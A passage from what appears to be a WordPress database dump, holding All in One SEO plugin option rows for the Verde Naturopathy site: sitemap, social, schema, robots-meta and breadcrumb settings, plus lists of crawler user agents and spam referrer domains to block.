\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"}}}},\"rss\":{\"enable\":true,\"linksPerIndex\":50,\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"product\"]}},\"html\":{\"enable\":true,\"pageUrl\":\"\",\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"product\"]},\"taxonomies\":{\"all\":true,\"included\":[\"category\",\"post_tag\",\"product_cat\",\"product_tag\"]},\"sortOrder\":\"publish_date\",\"sortDirection\":\"asc\",\"publicationDate\":true,\"compactArchives\":false,\"advancedSettings\":{\"enable\":false,\"nofollowLinks\":false,\"excludePosts\":[],\"excludeTerms\":[]}}},\"social\":{\"profiles\":{\"sameUsername\":{\"enable\":false,\"username\":null,\"included\":[\"facebookPageUrl\",\"twitterUrl\",\"pinterestUrl\",\"instagramUrl\",\"youtubeUrl\",\"linkedinUrl\"]},\"urls\":{\"facebookPageUrl\":\"https:\\/\\/www.facebook.com\\/verdenaturopathy\\/\",\"twitterUrl\":null,\"instagramUrl\":\"https:\\/\\/www.instagram.com\\/verde_naturopathy\\/\",\"pinterestUrl\":null,\"youtubeUrl\":null,\"linkedinUrl\":null,\"tumblrUrl\":null,\"yelpPageUrl\":null,\"soundCloudUrl\":null,\"wikipediaUrl\":null,\"myspaceUrl\":null,\"googlePlacesUrl\":null}},\"siteSocialProfiles\":null,\"facebook\":{\"general\":{\"enable\":true,\"defaultImageSourcePosts\":\"default\",\"customFieldImagePosts\":null,\"defaultImagePosts\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2021\\/04\\/cropped-Standard-01-2.jpg\",\"defaultImagePostsWidth\":\"\",\"defaultImagePostsHeight\":\"\",\"showAuthor\":true,\"siteName\":\"#site_title #separator_sa #tagline\"},\"homePage\":{\"image\":\"\",\"title\":\"\",\"description\":\"\",\"imageWidth\":\"\",\"imageHeight\":\"\",\"objectType\":\"website\"},\"advanced\":{\"enable\":false,\"adminId\":\"\",\"appId\":\"\",\"authorUrl\":\"\",\"generateArticleTags\":false,\"useKeywordsInTags\":true,\"useCategoriesInTags\":true,\"usePostTagsInTags\":true}},\"twitter\":{\"general\":{\"enable\":true,\"useOgData\":false,\"defaultCardType\":\"summary\",\"defaultImageSourcePosts\":\"default\",\"customFieldImagePosts\":null,\"defaultImagePosts\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2021\\/04\\/cropped-Standard-01-2.jpg\",\"showAuthor\":true,\"additionalData\":false},\"homePage\":{\"image\":\"\",\"title\":\"\",\"description\":\"\",\"cardType\":\"summary\"}}},\"searchAppearance\":{\"global\":{\"separator\":\"-\",\"siteTitle\":\"#site_title #separator_sa #tagline\",\"metaDescription\":\"#tagline\",\"keywords\":null,\"schema\":{\"siteRepresents\":\"organization\",\"person\":null,\"organizationName\":\"Verde Naturopathy\",\"organizationLogo\":\"https:\\/\\/verdenaturopathy.com.au\\/wp-content\\/uploads\\/2021\\/04\\/cropped-Standard-01-2.jpg\",\"personName\":null,\"personLogo\":null,\"phone\":\"+61421194346\",\"contactType\":\"manual\",\"contactTypeManual\":\"Mel\"}},\"advanced\":{\"globalRobotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noindexPaginated\":true,\"nofollowPaginated\":true,\"noindexFeed\":true,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"sitelinks\":true,\"noIndexEmptyCat\":true,\"removeStopWords\":false,\"noPaginationForCanonical\":true,\"useKeywords\":false,\"keywordsLooking\":true,\"useCategoriesForMetaKeywords\":false,\"useTagsForMetaKeywords\":false,\"dynamicallyGenerateKeywords\":false,\"pagedFormat\":\"- Page #page_number\",\"runShortcodes\":false},\"archives\":{\"author\":{\"show\":true,\"title\":\"#author_name #separator_sa #site_title\",\"metaDescription\":\"#author_bio\",\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null}},\"date\":{\"show\":true,\"title\":\"#archive_date #separator_sa #site_title\",\"metaDescription\":\"\",\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null}},\"search\":{\"show\":false,\"title\":\"#search_term #separator_sa #site_title\",\"metaDescription\":\"\",\"advanced\":{\"robotsMeta\":{\"default\":false,\"noindex\":true,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null}}}},\"tools\":{\"robots\":{\"enable\":false,\"rules\":[],\"robotsDetected\":true},\"importExport\":{\"backup\":{\"lastTime\":null,\"data\":null}}},\"deprecated\":{\"webmasterTools\":{\"googleAnalytics\":{\"id\":null,\"advanced\":false,\"trackingDomain\":null,\"multipleDomains\":false,\"additionalDomains\":null,\"anonymizeIp\":false,\"displayAdvertiserTracking\":false,\"excludeUsers\":[],\"trackOutboundLinks\":false,\"enhancedLinkAttribution\":false,\"enhancedEcommerce\":false}},\"searchAppearance\":{\"global\":{\"descriptionFormat\":null,\"schema\":{\"enableSchemaMarkup\":true}},\"advanced\":{\"autogenerateDescriptions\":true,\"runShortcodesInDescription\":true,\"useContentForAutogeneratedDescriptions\":false,\"excludePosts\":[],\"excludeTerms\":[]}},\"sitemap\":{\"general\":{\"advancedSettings\":{\"dynamic\":true}}},\"tools\":{\"blocker\":{\"blockBots\":null,\"blockReferer\":null,\"track\":null,\"custom\":{\"enable\":null,\"bots\":\"Abonti\\naggregator\\nAhrefsBot\\nasterias\\nBDCbot\\nBLEXBot\\nBuiltBotTough\\nBullseye\\nBunnySlippers\\nca-crawler\\nCCBot\\nCegbfeieh\\nCheeseBot\\nCherryPicker\\nCopyRightCheck\\ncosmos\\nCrescent\\ndiscobot\\nDittoSpyder\\nDotBot\\nDownload Ninja\\nEasouSpider\\nEmailCollector\\nEmailSiphon\\nEmailWolf\\nEroCrawler\\nExtractorPro\\nFasterfox\\nFeedBooster\\nFoobot\\nGenieo\\ngrub-client\\nHarvest\\nhloader\\nhttplib\\nHTTrack\\nhumanlinks\\nieautodiscovery\\nInfoNaviRobot\\nIstellaBot\\nJava\\/1.\\nJennyBot\\nk2spider\\nKenjin Spider\\nKeyword Density\\/0.9\\nlarbin\\nLexiBot\\nlibWeb\\nlibwww\\nLinkextractorPro\\nlinko\\nLinkScan\\/8.1a Unix\\nLinkWalker\\nLNSpiderguy\\nlwp-trivial\\nmagpie\\nMata Hari\\nMaxPointCrawler\\nMegaIndex\\nMicrosoft URL Control\\nMIIxpc\\nMippin\\nMissigua Locator\\nMister PiX\\nMJ12bot\\nmoget\\nMSIECrawler\\nNetAnts\\nNICErsPRO\\nNiki-Bot\\nNPBot\\nNutch\\nOffline Explorer\\nOpenfind\\npanscient.com\\nPHP\\/5.{\\nProPowerBot\\/2.14\\nProWebWalker\\nPython-urllib\\nQueryN Metasearch\\nRepoMonkey\\nSISTRIX\\nsitecheck.Internetseer.com\\nSiteSnagger\\nSnapPreviewBot\\nSogou\\nSpankBot\\nspanner\\nspbot\\nSpinn3r\\nsuzuran\\nSzukacz\\/1.4\\nTeleport\\nTelesoft\\nThe Intraformant\\nTheNomad\\nTightTwatBot\\nTitan\\ntoCrawl\\/UrlDispatcher\\nTrue_Robot\\nturingos\\nTurnitinBot\\nUbiCrawler\\nUnisterBot\\nURLy Warning\\nVCI\\nWBSearchBot\\nWeb Downloader\\/6.9\\nWeb Image Collector\\nWebAuto\\nWebBandit\\nWebCopier\\nWebEnhancer\\nWebmasterWorldForumBot\\nWebReaper\\nWebSauger\\nWebsite Quester\\nWebster Pro\\nWebStripper\\nWebZip\\nWotbox\\nwsr-agent\\nWWW-Collector-E\\nXenu\\nZao\\nZeus\\nZyBORG\\ncoccoc\\nIncutio\\nlmspider\\nmemoryBot\\nserf\\nUnknown\\nuptime files\",\"referer\":\"semalt.com\\nkambasoft.com\\nsavetubevideo.com\\nbuttons-for-website.com\\nsharebutton.net\\nsoundfrost.org\\nsrecorder.com\\nsoftomix.com\\nsoftomix.net\\nmyprintscreen.com\\njoinandplay.me\\nfbfreegifts.com\\nopenmediasoft.com\\nzazagames.org\\nextener.org\\nopenfrost.com\\nopenfrost.net\\ngooglsucks.com\\nbest-seo-offer.com\\nbuttons-for-your-website.com\\nwww.Get-Free-Traffic-Now.com\\nbest-seo-solution.com\\nbuy-cheap-online.info\\nsite3.free-share-buttons.com\\nwebmaster-traffic.com\"}}}}}','yes'),(16617,'aioseo_options_lite','{\"advanced\":{\"usageTracking\":false}}','yes'),(16618,'aioseo_options_dynamic','{\"sitemap\":{\"priority\":{\"postTypes\":{\"post\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"page\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"attachment\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"project\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"}},\"taxonomies\":[]}},\"social\":{\"facebook\":{\"general\":{\"postTypes\":{\"post\":{\"objectType\":\"article\"},\"page\":{\"objectType\":\"article\"},\"attachment\":{\"objectType\":\"article\"},\"project\":{\"objectType\":\"article\"}}}}},\"searchAppearance\":{\"postTypes\":{\"post\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"bulkEditing\":\"enabled\"},\"title\":\"#post_title #separator_sa #site_title\",\"metaDescription\":\"#post_excerpt\",\"schemaType\":\"Article\",\"webPageType\":\"WebPage\",\"articleType\":\"BlogPosting\",\"customFields\":null},\"page\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"bulkEditing\":\"enabled\"},\"title\":\"#post_title #separator_sa #site_title\",\"metaDescription\":\"#post_content\",\"schemaType\":\"WebPage\",\"webPageType\":\"WebPage\",\"articleType\":\"BlogPosting\",\"customFields\":null},\"attachment\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"bulkEditing\":\"enabled\"},\"title\":\"#post_title #separator_sa #site_title\",\"metaDescription\":\"#attachment_caption\",\"schemaType\":\"ItemPage\",\"webPageType\":\"ItemPage\",\"articleType\":\"BlogPosting\",\"customFields\":null,\"redirectAttachmentUrls\":\"attachment\"},\"project\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"bulkEditing\":\"enabled\"},\"title\":\"#post_title #separator_sa #site_title\",\"metaDescription\":\"#post_excerpt\",\"schemaType\":\"WebPage\",\"webPageType\":\"WebPage\",\"articleType\":\"BlogPosting\",\"customFields\":null}},\"taxonomies\":{\"category\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"post_tag\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"layout_category\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"layout_pack\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"layout_type\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"scope\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"module_width\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"project_category\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"},\"project_tag\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true},\"title\":\"#taxonomy_title #separator_sa #site_title\",\"metaDescription\":\"#taxonomy_description\"}},\"archives\":{\"project\":{\"show\":true,\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null},\"title\":\"#archive_title #separator_sa #site_title\",\"metaDescription\":\"\",\"customFields\":null}}}}','yes'),(67326,'aioseo_options_internal_network','{\"internal\":{\"validLicenseKey\":null,\"lastActiveVersion\":\"4.2.0\",\"migratedVersion\":\"0.0\",\"siteAnalysis\":{\"connectToken\":null,\"score\":0,\"results\":null,\"competitors\":[]},\"headlineAnalysis\":{\"headlines\":[]},\"wizard\":null,\"category\":null,\"categoryOther\":null,\"deprecatedOptions\":[]},\"integrations\":{\"semrush\":{\"accessToken\":null,\"tokenType\":null,\"expires\":null,\"refreshToken\":null}},\"database\":{\"installedTables\":\"{\\\"wpln_aioseo_posts\\\":[\\\"id\\\",\\\"post_id\\\",\\\"title\\\",\\\"description\\\",\\\"keywords\\\",\\\"keyphrases\\\",\\\"page_analysis\\\",\\\"canonical_url\\\",\\\"og_title\\\",\\\"og_description\\\",\\\"og_object_type\\\",\\\"og_image_type\\\",\\\"og_image_url\\\",\\\"og_image_width\\\",\\\"og_image_height\\\",\\\"og_image_custom_url\\\",\\\"og_image_custom_fields\\\",\\\"og_video\\\",\\\"og_custom_url\\\",\\\"og_article_section\\\",\\\"og_article_tags\\\",\\\"twitter_use_og\\\",\\\"twitter_card\\\",\\\"twitter_image_type\\\",\\\"twitter_image_url\\\",\\\"twitter_image_custom_url\\\",\\\"twitter_image_custom_fields\\\",\\\"twitter_title\\\",\\\"twitter_description\\\",\\\"seo_score\\\",\\\"schema_type\\\",\\\"schema_type_options\\\",\\\"pillar_content\\\",\\\"robots_default\\\",\\\"robots_noindex\\\",\\\"robots_noarchive\\\",\\\"robots_nosnippet\\\",\\\"robots_nofollow\\\",\\\"robots_noimageindex\\\",\\\"robots_noodp\\\",\\\"robots_notranslate\\\",\\\"robots_max_snippet\\\",\\\"robots_max_videopreview\\\",\\\"robots_max_imagepreview\\\",\\\"tabs\\\",\\\"images\\\",\\\"image_scan_date\\\",\\\"priority\\\",\\\"frequency\\\",\\\"videos\\\",\\\"video_thumbnail\\\",\\\"video_scan_date\\\",\\\"local_seo\\\",\\\"limit_modified_date\\\",\\\"created\\\",\\\"updated\\\"],\\\"wpln_actionscheduler_actions\\\":[],\\\"wpln_actionscheduler_logs\\\":[],\\\"wpln_actionscheduler_groups\\\":[],\\\"wpln_actionscheduler_claims\\\":[],\\\"wpln_aioseo_notifications\\\":[]}\"}}','yes'),(67327,'aioseo_options_internal_network_lite','{\"internal\":{\"activated\":0,\"firstActivated\":0,\"installed\":0,\"connect\":{\"key\":null,\"time\":0,\"network\":false,\"token\":null}}}','yes'),(67328,'aioseo_options_network','{\"internal\":[],\"webmasterTools\":{\"google\":null,\"bing\":null,\"yandex\":null,\"baidu\":null,\"pinterest\":null,\"microsoftClarityProjectId\":null,\"alexa\":null,\"norton\":null,\"miscellaneousVerification\":null},\"breadcrumbs\":{\"enable\":true,\"separator\":\"»\",\"homepageLink\":true,\"homepageLabel\":\"Home\",\"breadcrumbPrefix\":null,\"archiveFormat\":\"Archives for #breadcrumb_archive_post_type_name\",\"searchResultFormat\":\"Search Results for \'#breadcrumb_search_string\'\",\"errorFormat404\":\"404 - Page Not Found\",\"showCurrentItem\":true,\"linkCurrentItem\":false,\"categoryFullHierarchy\":false,\"showBlogHome\":false},\"rssContent\":{\"before\":null,\"after\":\"<p>The post #post_link first appeared on #site_link.<\\/p>\"},\"advanced\":{\"truSeo\":true,\"headlineAnalyzer\":true,\"seoAnalysis\":true,\"dashboardWidgets\":true,\"announcements\":true,\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"product\"]},\"taxonomies\":{\"all\":true,\"included\":[\"category\",\"post_tag\",\"product_cat\",\"product_tag\"]},\"uninstall\":false},\"sitemap\":{\"general\":{\"enable\":true,\"filename\":\"sitemap\",\"indexes\":true,\"linksPerIndex\":1000,\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"attachment\",\"product\"]},\"taxonomies\":{\"all\":true,\"included\":[\"category\",\"post_tag\",\"product_cat\",\"product_tag\"]},\"author\":false,\"date\":false,\"additionalPages\":{\"enable\":false,\"pages\":[]},\"advancedSettings\":{\"enable\":false,\"excludeImages\":false,\"excludePosts\":[],\"excludeTerms\":[],\"priority\":{\"homePage\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"postTypes\":{\"grouped\":true,\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"taxonomies\":{\"grouped\":true,\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"archive\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"},\"author\":{\"priority\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\",\"frequency\":\"{\\\"label\\\":\\\"default\\\",\\\"value\\\":\\\"default\\\"}\"}}}},\"rss\":{\"enable\":true,\"linksPerIndex\":50,\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"product\"]}},\"html\":{\"enable\":true,\"pageUrl\":\"\",\"postTypes\":{\"all\":true,\"included\":[\"post\",\"page\",\"product\"]},\"taxonomies\":{\"all\":true,\"included\":[\"category\",\"post_tag\",\"product_cat\",\"product_tag\"]},\"sortOrder\":\"publish_date\",\"sortDirection\":\"asc\",\"publicationDate\":true,\"compactArchives\":false,\"advancedSettings\":{\"enable\":false,\"nofollowLinks\":false,\"excludePosts\":[],\"excludeTerms\":[]}}},\"social\":{\"profiles\":{\"sameUsername\":{\"enable\":false,\"username\":null,\"included\":[\"facebookPageUrl\",\"twitterUrl\",\"pinterestUrl\",\"instagramUrl\",\"youtubeUrl\",\"linkedinUrl\"]},\"urls\":{\"facebookPageUrl\":null,\"twitterUrl\":null,\"instagramUrl\":null,\"pinterestUrl\":null,\"youtubeUrl\":null,\"linkedinUrl\":null,\"tumblrUrl\":null,\"yelpPageUrl\":null,\"soundCloudUrl\":null,\"wikipediaUrl\":null,\"myspaceUrl\":null,\"googlePlacesUrl\":null}},\"siteSocialProfiles\":null,\"facebook\":{\"general\":{\"enable\":true,\"defaultImageSourcePosts\":\"default\",\"customFieldImagePosts\":null,\"defaultImagePosts\":\"\",\"defaultImagePostsWidth\":\"\",\"defaultImagePostsHeight\":\"\",\"showAuthor\":true,\"siteName\":\"#site_title #separator_sa #tagline\"},\"homePage\":{\"image\":\"\",\"title\":\"\",\"description\":\"\",\"imageWidth\":\"\",\"imageHeight\":\"\",\"objectType\":\"website\"},\"advanced\":{\"enable\":false,\"adminId\":\"\",\"appId\":\"\",\"authorUrl\":\"\",\"generateArticleTags\":false,\"useKeywordsInTags\":true,\"useCategoriesInTags\":true,\"usePostTagsInTags\":true}},\"twitter\":{\"general\":{\"enable\":true,\"useOgData\":false,\"defaultCardType\":\"summary\",\"defaultImageSourcePosts\":\"default\",\"customFieldImagePosts\":null,\"defaultImagePosts\":\"\",\"showAuthor\":true,\"additionalData\":false},\"homePage\":{\"image\":\"\",\"title\":\"\",\"description\":\"\",\"cardType\":\"summary\"}}},\"searchAppearance\":{\"global\":{\"separator\":\"-\",\"siteTitle\":\"#site_title #separator_sa #tagline\",\"metaDescription\":\"#tagline\",\"keywords\":null,\"schema\":{\"siteRepresents\":\"organization\",\"person\":null,\"organizationName\":\"Verde Naturopathy\",\"organizationLogo\":\"\",\"personName\":null,\"personLogo\":null,\"phone\":null,\"contactType\":null,\"contactTypeManual\":null}},\"advanced\":{\"globalRobotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noindexPaginated\":true,\"nofollowPaginated\":true,\"noindexFeed\":true,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"sitelinks\":true,\"noIndexEmptyCat\":true,\"removeStopWords\":false,\"noPaginationForCanonical\":true,\"useKeywords\":false,\"keywordsLooking\":true,\"useCategoriesForMetaKeywords\":false,\"useTagsForMetaKeywords\":false,\"dynamicallyGenerateKeywords\":false,\"pagedFormat\":\"- Page #page_number\",\"runShortcodes\":false},\"archives\":{\"author\":{\"show\":true,\"title\":\"#author_name #separator_sa #site_title\",\"metaDescription\":\"#author_bio\",\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null}},\"date\":{\"show\":true,\"title\":\"#archive_date #separator_sa #site_title\",\"metaDescription\":\"\",\"advanced\":{\"robotsMeta\":{\"default\":true,\"noindex\":false,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null}},\"search\":{\"show\":false,\"title\":\"#search_term #separator_sa #site_title\",\"metaDescription\":\"\",\"advanced\":{\"robotsMeta\":{\"default\":false,\"noindex\":true,\"nofollow\":false,\"noarchive\":false,\"noimageindex\":false,\"notranslate\":false,\"nosnippet\":false,\"noodp\":false,\"maxSnippet\":-1,\"maxVideoPreview\":-1,\"maxImagePreview\":\"large\"},\"showDateInGooglePreview\":true,\"showPostThumbnailInSearch\":true,\"showMetaBox\":true,\"keywords\":null}}}},\"tools\":{\"robots\":{\"enable\":false,\"rules\":[],\"robotsDetected\":true},\"importExport\":{\"backup\":{\"lastTime\":null,\"data\":null}}},\"deprecated\":{\"webmasterTools\":{\"googleAnalytics\":{\"id\":null,\"advanced\":false,\"trackingDomain\":null,\"multipleDomains\":false,\"additionalDomains\":null,\"anonymizeIp\":false,\"displayAdvertiserTracking\":false,\"excludeUsers\":[],\"trackOutboundLinks\":false,\"enhancedLinkAttribution\":false,\"enhancedEcommerce\":false}},\"searchAppearance\":{\"global\":{\"descriptionFormat\":null,\"schema\":{\"enableSchemaMarkup\":true}},\"advanced\":{\"autogenerateDescriptions\":true,\"runShortcodesInDescription\":true,\"useContentForAutogeneratedDescriptions\":false,\"excludePosts\":[],\"excludeTerms\":[]}},\"sitemap\":{\"general\":{\"advancedSettings\":{\"dynamic\":true}}},\"tools\":{\"blocker\":{\"blockBots\":null,\"blockReferer\":null,\"track\":null,\"custom\":{\"enable\":null,\"bots\":\"Abonti\\naggregator\\nAhrefsBot\\nasterias\\nBDCbot\\nBLEXBot\\nBuiltBotTough\\nBullseye\\nBunnySlippers\\nca-crawler\\nCCBot\\nCegbfeieh\\nCheeseBot\\nCherryPicker\\nCopyRightCheck\\ncosmos\\nCrescent\\ndiscobot\\nDittoSpyder\\nDotBot\\nDownload 